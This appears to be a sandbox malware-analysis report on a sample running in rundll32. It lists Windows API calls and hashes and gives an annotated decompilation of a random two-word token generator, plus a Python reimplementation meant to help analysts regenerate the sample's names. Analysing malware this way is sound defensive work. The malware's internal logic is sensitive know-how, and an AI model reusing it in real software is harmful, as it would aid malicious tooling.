                                                          • Opcode ID: 8876ad11f62043bdc7fcecd5e9ba443e2f9ff973ecca4d816d69c2daa71e3b2c
                                                          • Instruction ID: 563c7688316c9403f268388aab85d859ef79458c053530e82e174bb8cc53cd8d
                                                          • Opcode Fuzzy Hash: 8876ad11f62043bdc7fcecd5e9ba443e2f9ff973ecca4d816d69c2daa71e3b2c
                                                          • Instruction Fuzzy Hash: 7E111776900108FFDB11EB99EC85CEEBFBDFB48214B014066F901E2014EB35AE49EB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,05585956,?,00000000,000000FF,?,00000F00), ref: 0557DD85
                                                          • lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,05585956,?,00000000,000000FF,?,00000F00), ref: 0557DD8C
                                                          • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0557DD9E
                                                          • _snprintf.NTDLL ref: 0557DDC4
                                                            • Part of subcall function 05586CA6: memset.NTDLL ref: 05586CBB
                                                            • Part of subcall function 05586CA6: lstrlenW.KERNEL32(00000000,00000000,00000000,77A2DBB0,00000020,00000000), ref: 05586CF4
                                                            • Part of subcall function 05586CA6: wcstombs.NTDLL ref: 05586CFE
                                                            • Part of subcall function 05586CA6: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77A2DBB0,00000020,00000000), ref: 05586D2F
                                                            • Part of subcall function 05586CA6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0557DDD2), ref: 05586D5B
                                                            • Part of subcall function 05586CA6: TerminateProcess.KERNEL32(?,000003E5), ref: 05586D71
                                                            • Part of subcall function 05586CA6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0557DDD2), ref: 05586D85
                                                            • Part of subcall function 05586CA6: CloseHandle.KERNEL32(?), ref: 05586DB8
                                                            • Part of subcall function 05586CA6: CloseHandle.KERNEL32(?), ref: 05586DBD
                                                          • _snprintf.NTDLL ref: 0557DDF8
                                                            • Part of subcall function 05586CA6: GetLastError.KERNEL32 ref: 05586D89
                                                            • Part of subcall function 05586CA6: GetExitCodeProcess.KERNEL32(?,00000001), ref: 05586DA9
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 0557DE15
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                                          • String ID:
                                                          • API String ID: 1481739438-0
                                                          • Opcode ID: 5aef236936739ed3ac6058d00be3fcf7f4b7c50157e1bb3206f13badab1cffe4
                                                          • Instruction ID: ee548623e421958ee974b69c13b9a73c948784491b9b3eee904b3af68d25993e
                                                          • Opcode Fuzzy Hash: 5aef236936739ed3ac6058d00be3fcf7f4b7c50157e1bb3206f13badab1cffe4
                                                          • Instruction Fuzzy Hash: FA1100B2610219BFCF11AF95DC85D9A3F7CFF08360B024016FD0997211CA39EA18EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(05572D6E,00000000,00000000,00000008,?,?,05572D6E,05571AE4,00000000,?), ref: 0558EB1A
                                                          • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 0558EB2D
                                                          • lstrcpy.KERNEL32(00000008,05572D6E), ref: 0558EB4F
                                                          • GetLastError.KERNEL32(05589562,00000000,00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 0558EB78
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 0558EB90
                                                          • CloseHandle.KERNEL32(00000000,05589562,00000000,00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 0558EB99
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 2860611006-0
                                                          • Opcode ID: dc79156947ce23db84e987d38e71d62e0c706470379cd09df826e405198a5288
                                                          • Instruction ID: 86e2413af7185de2ffd4391a3c561c62ff5c6189cb468961aabd57659945fdac
                                                          • Opcode Fuzzy Hash: dc79156947ce23db84e987d38e71d62e0c706470379cd09df826e405198a5288
                                                          • Instruction Fuzzy Hash: DE117F71605209EFDB10AF65D88A8AE7BBCFB45262705452AF457E3200DB349D099B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                          • GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                          • lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 1175089793-0
                                                          • Opcode ID: 267f1aa5ee2616037faf91e9d39a85274a18d25a78beb1cdedcac2c8d1801d1c
                                                          • Instruction ID: 3661fdcc0e4abe801355fbbabee5c860dc6fdeb6298cf9d54ffc3d98b131670c
                                                          • Opcode Fuzzy Hash: 267f1aa5ee2616037faf91e9d39a85274a18d25a78beb1cdedcac2c8d1801d1c
                                                          • Instruction Fuzzy Hash: B501A132A1462AAB9B115BA69C89D6B3FACFBC1A907060016F906D3100DE6CED08D7F5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastmemset
                                                          • String ID: vids
                                                          • API String ID: 3276359510-3767230166
                                                          • Opcode ID: 364469d61004388342a4bd34d63fc4d7d3f5df7e98131dfd13bbbf5867f68ddb
                                                          • Instruction ID: f2304d50cfbe28d6bd317ac5bb5342eb5c84e23f1a80fc8b94f324ee5a85a042
                                                          • Opcode Fuzzy Hash: 364469d61004388342a4bd34d63fc4d7d3f5df7e98131dfd13bbbf5867f68ddb
                                                          • Instruction Fuzzy Hash: 6D8107B1E10219EFCF20EFA4D9849ADBBB9FF48710F10855AF415EB250DA359A45CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00E562BF
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E563A2
                                                            • Part of subcall function 00E54598: SysAllocString.OLEAUT32(00E592B0), ref: 00E545E8
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 00E563F6
                                                          • SysFreeString.OLEAUT32(?), ref: 00E56404
                                                            • Part of subcall function 00E5708C: Sleep.KERNEL32(000001F4), ref: 00E570D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                          • String ID: }
                                                          • API String ID: 3193056040-3553927478
                                                          • Opcode ID: ef14869cae9a18b9d644d0a454f7caaa3be912a7b75ea4c4bfc07be7525fa987
                                                          • Instruction ID: 8c5455316b43656940483ee12273d4f6d00f86e02761b62d4aa414938d76a197
                                                          • Opcode Fuzzy Hash: ef14869cae9a18b9d644d0a454f7caaa3be912a7b75ea4c4bfc07be7525fa987
                                                          • Instruction Fuzzy Hash: F2512F76900209EFCB10DFA4C8848AEB7F6FF88315B548C69E955FB260D731AD49CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 05575435
                                                          • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 0557549C
                                                          • GetLastError.KERNEL32(?,00000000,00000000), ref: 055754A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: BuffersErrorFileFlushLastmemset
                                                          • String ID: K$P
                                                          • API String ID: 3817869962-420285281
                                                          • Opcode ID: 31e679c1b7a62654acd3a0aa5bfd7cdfe952d0164d8d069995e912710f60f778
                                                          • Instruction ID: 6ed07f644e7a011ccb37e6a5d4ae8fa6e4de04556a68ff401bc5255afc47eb06
                                                          • Opcode Fuzzy Hash: 31e679c1b7a62654acd3a0aa5bfd7cdfe952d0164d8d069995e912710f60f778
                                                          • Instruction Fuzzy Hash: 9A418171A04709DFDB24CFA4D984ABEBBF6FF44705F14492DD48A93680E735A908CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memcpy.NTDLL(?,055817A3,00000000,?,?,?,055817A3,?,?,?,?,?), ref: 05581CCB
                                                          • lstrlen.KERNEL32(055817A3,?,?,?,055817A3,?,?,?,?,?), ref: 05581CE9
                                                          • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 05581D58
                                                          • lstrlen.KERNEL32(055817A3,00000000,00000000,?,?,?,055817A3,?,?,?,?,?), ref: 05581D79
                                                          • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 05581D8D
                                                          • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 05581D96
                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 05581DA4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$FreeLocal
                                                          • String ID:
                                                          • API String ID: 1123625124-0
                                                          • Opcode ID: e82d5f7a1054e41356227e4c2c8fc7a73fdf106a0f9758ce4ecb126b9870e201
                                                          • Instruction ID: 9ddcef2153919bb920364de506f574384ae0375a5278b8d2128d00dec7d0830d
                                                          • Opcode Fuzzy Hash: e82d5f7a1054e41356227e4c2c8fc7a73fdf106a0f9758ce4ecb126b9870e201
                                                          • Instruction Fuzzy Hash: 9A41067290061AAFCF10EF69DC459AA3FA8FF043A0B054416FD19A7210E635EE65DBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memcpy.NTDLL(?,?,00000010), ref: 055901E1
                                                          • memcpy.NTDLL(00000000,?,?,00000010), ref: 05590274
                                                          • GetLastError.KERNEL32(?,?,00000010), ref: 055902CC
                                                          • GetLastError.KERNEL32 ref: 055902FE
                                                          • GetLastError.KERNEL32 ref: 05590312
                                                          • GetLastError.KERNEL32 ref: 05590327
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$memcpy
                                                          • String ID:
                                                          • API String ID: 2760375183-0
                                                          • Opcode ID: da5ee6887bc530691db436172c095fe345b900475db24cf4db21ec42261584d8
                                                          • Instruction ID: a8018d0cb8d6a8a1b7fa8bd76718c4ba9eaa327791e6141fc2a1c9e85400aeb3
                                                          • Opcode Fuzzy Hash: da5ee6887bc530691db436172c095fe345b900475db24cf4db21ec42261584d8
                                                          • Instruction Fuzzy Hash: B5516D71904208FFEF10DFE9DC88AAEBBB9FB44350F048826F901E6190D7399A54DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • lstrcpy.KERNEL32(?,00000020), ref: 055879D4
                                                          • lstrcat.KERNEL32(?,00000020), ref: 055879E9
                                                          • lstrcmp.KERNEL32(00000000,?), ref: 05587A00
                                                          • lstrlen.KERNEL32(?,?,BD092303,00000000,69B25F44), ref: 05587A24
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 961acca12e5ed05e8bc21b20bbe853511b401030bd8456342a62fe196070878a
                                                          • Instruction ID: 57cda0cc97110b63a700d7d207b41888cf05086a01813aa1e4b7d84842515f9a
                                                          • Opcode Fuzzy Hash: 961acca12e5ed05e8bc21b20bbe853511b401030bd8456342a62fe196070878a
                                                          • Instruction Fuzzy Hash: CE51B831A14118EFDF21EF99C4846BDBBB6FF49310F258096E825BB211C732AA55DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 22%
                                                          			// Decompiler output (quality 22%) with explanatory comments added by the editor.
                                                          			// What the function does: takes a CR/LF-separated word list (_a4, length _a8) and a
                                                          			// 32-bit PRNG seed (__eax), splits the list in place, upper-cases it, and builds a
                                                          			// table of random two-word tokens that it publishes in a global. E00E55FBC and
                                                          			// E00E513CC are the heap allocate/free wrappers (see the RtlAllocateHeap subcall in
                                                          			// the API list below). "_push(n); _pop(0)" is how the decompiler renders the
                                                          			// "push imm8 / pop eax" idiom, i.e. the Win32 error code left in eax.
                                                          			E00E52D0E(signed int __eax, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _t81;
                                                          				char _t83;
                                                          				signed int _t90;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				char _t101;
                                                          				unsigned int _t102;
                                                          				intOrPtr _t103;
                                                          				char* _t107;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				signed int _t118;
                                                          				signed int _t122;
                                                          				intOrPtr _t124;
                                                          
                                                          				_t102 = _a8;
                                                          				_t118 = 0;
                                                          				_v20 = __eax;                      // PRNG state starts at the caller-supplied seed
                                                          				_t122 = (_t102 >> 2) + 1;          // capacity of the line-pointer table: len/4 + 1 entries
                                                          				_v8 = 0;                           // longest line seen so far
                                                          				_a8 = 0;                           // reused as the line counter
                                                          				_t81 = E00E55FBC(_t122 << 2);      // allocate the pointer table (4 bytes per entry)
                                                          				_v16 = _t81;
                                                          				if(_t81 == 0) {
                                                          					_push(8);                        // eax = 8 (ERROR_NOT_ENOUGH_MEMORY)
                                                          					_pop(0);
                                                          					L37:
                                                          					return 0;
                                                          				}
                                                          				_t107 = _a4;
                                                          				_a4 = _t102;                       // remaining byte count
                                                          				_t113 = 0;                         // number of line pointers recorded
                                                          				// Pass 1: walk the buffer, terminate each line in place at CR/LF, record where
                                                          				// every non-empty line starts, and track the longest line and the line count.
                                                          				while(1) {
                                                          					_t83 =  *_t107;
                                                          					if(_t83 == 0) {
                                                          						break;
                                                          					}
                                                          					if(_t83 == 0xd || _t83 == 0xa) {
                                                          						if(_t118 != 0) {                 // only a non-empty line counts
                                                          							if(_t118 > _v8) {
                                                          								_v8 = _t118;
                                                          							}
                                                          							_a8 = _a8 + 1;
                                                          							_t118 = 0;
                                                          						}
                                                          						 *_t107 = 0;                      // NUL-terminate the line in place
                                                          						goto L16;
                                                          					} else {
                                                          						if(_t118 != 0) {
                                                          							L10:
                                                          							_t118 = _t118 + 1;               // current line length
                                                          							L16:
                                                          							_t107 = _t107 + 1;
                                                          							_t15 =  &_a4;
                                                          							 *_t15 = _a4 - 1;
                                                          							if( *_t15 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						if(_t113 == _t122) {             // pointer table full: stop scanning
                                                          							L21:
                                                          							if(_a8 <= 0x20) {                // fewer than 33 lines is rejected
                                                          								_push(0xb);                    // eax = 0xb (ERROR_BAD_FORMAT)
                                                          								L34:
                                                          								_pop(0);
                                                          								L35:
                                                          								E00E513CC(_v16);               // free the pointer table and fail
                                                          								goto L37;
                                                          							}
                                                          							// Output table: one 4-byte pointer per token plus room for two words and a
                                                          							// NUL (2*maxlen + 1), i.e. (2*maxlen + 5) bytes per entry.
                                                          							_t103 = E00E55FBC((_v8 + _v8 + 5) * _a8 + 4);
                                                          							if(_t103 == 0) {
                                                          								_push(8);
                                                          								goto L34;
                                                          							}
                                                          							_t90 = _a8;                      // token count = line count
                                                          							_a4 = _a4 & 0x00000000;          // tokens produced so far
                                                          							_v8 = _v8 & 0x00000000;          // loop counter
                                                          							_t124 = _t103 + _t90 * 4;        // string storage starts after the pointer array
                                                          							if(_t90 <= 0) {
                                                          								L31:
                                                          								 *0xe5a2cc = _t103;              // publish the finished table in a global
                                                          								goto L35;
                                                          							}
                                                          							// Pass 2: two steps of the LCG x' = x * 0x19660D + 0x3C6EF35F per token;
                                                          							// the first state selects word 1, the second selects word 2.
                                                          							do {
                                                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));   // lstrcpy(dst, words[r1 % n])
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));    // lstrcat(dst, words[r2 % n]), no separator
                                                          								_v12 = _v12 & 0x00000000;
                                                          								if(_a4 <= 0) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								// Uniqueness check: lstrcmp the new token against every token already in the
                                                          								// table. The decompiler has merged lstrcmp's return value with the loop index
                                                          								// (_t99), so the duplicate path (break, then _v8--) is rendered unreliably.
                                                          								while(1) {
                                                          									L26:
                                                          									_t99 = _v12;
                                                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);          // lstrcmp(table[i], dst)
                                                          									if(_t99 == 0) {
                                                          										break;
                                                          									}
                                                          									_v12 = _v12 + 1;
                                                          									if(_v12 < _a4) {
                                                          										continue;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_v8 = _v8 - 1;
                                                          								L30:
                                                          								_t97 = _a4;
                                                          								_a4 = _a4 + 1;
                                                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;                  // store the token pointer
                                                          								__imp__(_t124);                                              // lstrlen(dst)
                                                          								_v8 = _v8 + 1;
                                                          								_t124 = _t124 + _t97 + 1;                                    // advance past the string and its NUL
                                                          							} while (_v8 < _a8);
                                                          							goto L31;
                                                          						}
                                                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;                    // record the start of this line
                                                          						_t101 = _t83;
                                                          						if(_t83 - 0x61 <= 0x19) {                                      // 'a'..'z' -> 'A'..'Z'
                                                          							_t101 = _t101 - 0x20;
                                                          						}
                                                          						 *_t107 = _t101;
                                                          						_t113 = _t113 + 1;
                                                          						goto L10;
                                                          					}
                                                          				}
                                                          				if(_t118 != 0) {                    // count a final line that has no trailing CR/LF
                                                          					if(_t118 > _v8) {
                                                          						_v8 = _t118;
                                                          					}
                                                          					_a8 = _a8 + 1;
                                                          				}
                                                          				goto L21;
                                                          			}

                                                          (Instruction-address column from the report's decompiler view, detached from the C code above by extraction: one address per C line, ranging 0x00e52d15 to 0x00e52e98, with 0x00000000 for lines the decompiler synthesized.)

                                                          APIs
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00E52E0B
                                                          • lstrcat.KERNEL32(69B25F45,00000020), ref: 00E52E20
                                                          • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00E52E37
                                                          • lstrlen.KERNEL32(69B25F45), ref: 00E52E5B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID: KE
                                                          • API String ID: 3214092121-838392977
                                                          • Opcode ID: 8ba4948bf58993e186e6cbba77884982eba5a1ba1794d87d7325bddd8de9323a
                                                          • Instruction ID: b55f4c7aca40041fb7e7028c8bcf18df8d87594c9db3c4663eee7810cfae632f
                                                          • Opcode Fuzzy Hash: 8ba4948bf58993e186e6cbba77884982eba5a1ba1794d87d7325bddd8de9323a
                                                          • Instruction Fuzzy Hash: 2251C431A00208EFDF15DF99C885AEDBBB5FF4631AF14985AED15BB211C7309A49CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
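                                                          The decompiled function E00E52D0E above is easier to reason about as a clean reimplementation. The following Python is an added example written by the editor, not code from the sample or from the sandbox; it reproduces the two passes (split the word list on CR/LF and fold a-z to A-Z; then draw two states of the LCG x' = x * 0x19660D + 0x3C6EF35F per token and concatenate the two selected words with no separator) so that, given the seed and word list recovered from a host, an analyst can regenerate the names the sample would produce. The word list is constructed for the example. Two points are assumptions rather than facts read from the decompilation: the modulo that indexes the word list is treated as unsigned (the decompiler types the operands as signed), and a duplicate detected by the lstrcmp loop is handled by drawing again, because the decompiler's rendering of that path is unreliable.

```python
"""Reimplementation of the token generator decompiled above (added example, not the sample's code)."""
from typing import List, Optional

# LCG constants read from the decompiled loop: x' = x * 0x19660D + 0x3C6EF35F (mod 2**32)
LCG_MUL = 0x19660D
LCG_INC = 0x3C6EF35F
MASK32 = 0xFFFFFFFF
MIN_LINES = 0x21          # the sample returns ERROR_BAD_FORMAT (0xb) when it finds <= 0x20 lines

# Constructed word list (not from the sample); the sample receives its list from its caller.
WORDLIST = b"\r\n".join([
    b"alpha", b"bravo", b"charlie", b"delta", b"echo", b"foxtrot", b"golf", b"hotel",
    b"india", b"juliet", b"kilo", b"lima", b"mike", b"november", b"oscar", b"papa",
    b"quebec", b"romeo", b"sierra", b"tango", b"uniform", b"victor", b"whiskey",
    b"xray", b"yankee", b"zulu", b"apple", b"berry", b"cedar", b"dune", b"ember",
    b"fjord", b"grove", b"harbor", b"island", b"jetty",
]) + b"\r\n"


def lcg_next(state: int) -> int:
    """One LCG step; the sample's 32-bit imul keeps only the low 32 bits."""
    return (state * LCG_MUL + LCG_INC) & MASK32


def split_wordlist(buf: bytes) -> List[bytes]:
    """Pass 1 of the decompiled function: cut on CR or LF, skip empty lines, fold a-z to A-Z."""
    words = []
    for line in buf.replace(b"\r", b"\n").split(b"\n"):
        if line:
            words.append(bytes(c - 0x20 if 0x61 <= c <= 0x7A else c for c in line))
    return words


def generate_tokens(seed: int, wordlist: bytes, count: Optional[int] = None) -> List[bytes]:
    """Pass 2: draw two LCG states per token, index the word list with each (unsigned
    modulo, an assumption), concatenate the two words without a separator, and reject
    duplicates (the lstrcmp loop; retry semantics are an assumption).
    The sample produces one token per input line; count lets you ask for fewer."""
    words = split_wordlist(wordlist)
    n = len(words)
    if n < MIN_LINES:
        raise ValueError("ERROR_BAD_FORMAT: need more than 0x20 non-empty lines, got %d" % n)
    if count is None:
        count = n
    if count > n * n:
        raise ValueError("cannot produce %d distinct pairs from %d words" % (count, n))
    state = seed & MASK32
    out: List[bytes] = []
    seen = set()
    attempts = 0
    while len(out) < count:
        attempts += 1
        if attempts > 64 * count:        # guard against a pathological seed/list combination
            raise RuntimeError("too many duplicate draws")
        r1 = lcg_next(state)             # selects the first word
        state = lcg_next(r1)             # selects the second word and becomes the new state
        token = words[r1 % n] + words[state % n]
        if token in seen:                # duplicate: draw again (assumed behaviour)
            continue
        seen.add(token)
        out.append(token)
    return out


if __name__ == "__main__":
    for tok in generate_tokens(0x1234, WORDLIST, 5):
        print(tok.decode())
```

                                                          Feed it the seed the sample actually used and the word list recovered from memory or from the dropped files, and the output is the ordered list of tokens the sample built; with the constructed list above it only demonstrates the mechanics.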

                                                          APIs
                                                            • Part of subcall function 0557E52C: ExpandEnvironmentStringsW.KERNEL32(755506E0,00000000,00000000,755506E0,00000020,80000001,055914F6,?,80000001), ref: 0557E53D
                                                            • Part of subcall function 0557E52C: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 0557E55A
                                                          • lstrlenW.KERNEL32(00000000,00000000,755506E0,00000020,?,80000001), ref: 0559151D
                                                          • lstrlenW.KERNEL32(00000008), ref: 05591524
                                                          • lstrlenW.KERNEL32(?,?), ref: 05591540
                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 055915BA
                                                          • lstrlenW.KERNEL32(?), ref: 055915C6
                                                          • wsprintfA.USER32 ref: 055915F4
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
                                                          • String ID:
                                                          • API String ID: 3384896299-0
                                                          • Opcode ID: 687d45e7ca57e9240ae5b53a39bdc95b44962bd8e696d1ad05de2679aa0f0c96
                                                          • Instruction ID: 72d7f1d8388a60a40818db41cfbcb59ffefb661d348adf33c2f67f0170b8f1cf
                                                          • Opcode Fuzzy Hash: 687d45e7ca57e9240ae5b53a39bdc95b44962bd8e696d1ad05de2679aa0f0c96
                                                          • Instruction Fuzzy Hash: D5415971A0020AAFCF11AFA9DD45DAE7BBDFF84204B054456F905E7211EB39DA14EF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000,0559B000,05594ADE), ref: 055759FC
                                                          • lstrlenW.KERNEL32(?,00000000,0559B000,05594ADE), ref: 05575A0D
                                                          • lstrlenW.KERNEL32(?,00000000,0559B000,05594ADE), ref: 05575A1F
                                                          • lstrlenW.KERNEL32(?,00000000,0559B000,05594ADE), ref: 05575A31
                                                          • lstrlenW.KERNEL32(?,00000000,0559B000,05594ADE), ref: 05575A43
                                                          • lstrlenW.KERNEL32(?,00000000,0559B000,05594ADE), ref: 05575A4F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID:
                                                          • API String ID: 1659193697-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0558EC07: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 0558EC13
                                                            • Part of subcall function 0558EC07: SetLastError.KERNEL32(000000B7,?,055920B0,?,?,00000000,?,?,?), ref: 0558EC24
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 055920D0
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 055921A8
